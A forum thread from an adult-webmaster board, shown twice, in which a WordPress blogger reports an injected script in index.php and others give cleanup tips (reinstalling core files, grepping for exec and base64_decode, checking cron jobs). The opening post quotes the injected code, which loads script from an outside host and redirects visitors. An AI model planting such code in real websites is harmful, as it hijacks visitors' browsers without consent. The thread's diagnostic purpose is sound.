PHP Injection?!?! http://valueaffiliate.net/abp - GoFuckYourself.com

Telly · 10-03-2011, 04:56 PM

I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp

It appears that this is some kind of cloaking injection on the index.php:
<script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript>

Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated!

Telly

AzteK · 10-03-2011, 04:57 PM

ugh my antivirus just blocked this

SASCH · 10-03-2011, 04:58 PM

You using WordPress?

Telly · 10-03-2011, 05:13 PM

Quote:

Originally Posted by SASCH

You using WordPress?

Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.

fris · 10-03-2011, 06:01 PM

Quote:

Originally Posted by Telly

Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.

download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.

Telly · 10-03-2011, 10:36 PM

Quote:

Originally Posted by fris

download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.

Thank you!

Mr Pheer · 10-03-2011, 10:39 PM

I'd like to kill the fuckin assholes that do this type of shit.

Telly · 10-04-2011, 12:16 PM

Quote:

Originally Posted by Mr Pheer

I'd like to kill the fuckin assholes that do this type of shit.

heh "like"

scouser · 10-05-2011, 05:25 AM

do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.

iSpyCams · 10-05-2011, 06:40 AM

a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.

Brujah · 10-05-2011, 06:42 AM

You may also need to clear any cache folders, like supercache, etc..

seeandsee · 10-05-2011, 06:50 AM

problem is how you got hacked, is it host, is it ftp, is it script...

vdbucks · 10-05-2011, 06:51 AM

Quote:

Originally Posted by deadmoon

do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.

xargs is faster ^^

for example... cd to blog root directory then

find . | xargs grep 'exec'

fris · 10-05-2011, 08:02 AM

shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.

this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself.

10-03-2011, 04:56 PM	#1
Telly Confirmed User Industry Role: Join Date: Jul 2007 Posts: 334	PHP Injection?!?! http://valueaffiliate.net/abp I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp It appears that this is some kind of cloaking injection on the index.php: <script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript> Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated! Telly __________________ MetroMoney.com - Limited-time $40PPS Promotion! DeviantHardcore.com

10-03-2011, 04:57 PM	#2
AzteK Confirmed User Industry Role: Join Date: Feb 2001 Location: Northern Cali, USA Posts: 3,439	ugh my antivirus just blocked this __________________ WANTED: Buying Blog Posts and Links

10-05-2011, 06:42 AM	#11
Brujah Beer Money Baron Industry Role: Join Date: Jan 2001 Location: brujah / gmail Posts: 22,157	You may also need to clear any cache folders, like supercache, etc.. __________________ Free Premium Domain Lists and Tools at Clickmojo.com For Sale: Obscenity.com

10-05-2011, 06:50 AM	#12
seeandsee Check SIG! Industry Role: Join Date: Mar 2006 Location: Europe (Skype: gojkoas) Posts: 50,945	problem is how you got hacked, is it host, is it ftp, is it script... __________________ BUY MY SIG - 50$/Year Contact here

10-05-2011, 08:02 AM	#14
fris Too lazy to set a custom title Industry Role: Join Date: Aug 2002 Posts: 55,267	shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server. this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself. __________________ Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence. WP Stuff

10-03-2011, 04:58 PM	#3
SASCH Confirmed User Industry Role: Join Date: Jul 2011 Posts: 107	You using WordPress?

10-03-2011, 10:39 PM	#7
Mr Pheer Living inside your head. Industry Role: Join Date: Dec 2002 Location: In your AirBNB Posts: 20,561	I'd like to kill the fuckin assholes that do this type of shit.

10-05-2011, 05:25 AM	#9
scouser marketer. Industry Role: Join Date: Aug 2006 Location: bcn Posts: 2,280	do a search for things like 'exec' or 'base64_decode' ie grep -r 'exec' ./ in ur root dir. anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.

10-05-2011, 06:40 AM	#10
iSpyCams Amateur Gynecologist Industry Role: Join Date: May 2009 Location: Medellin Posts: 4,436	a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.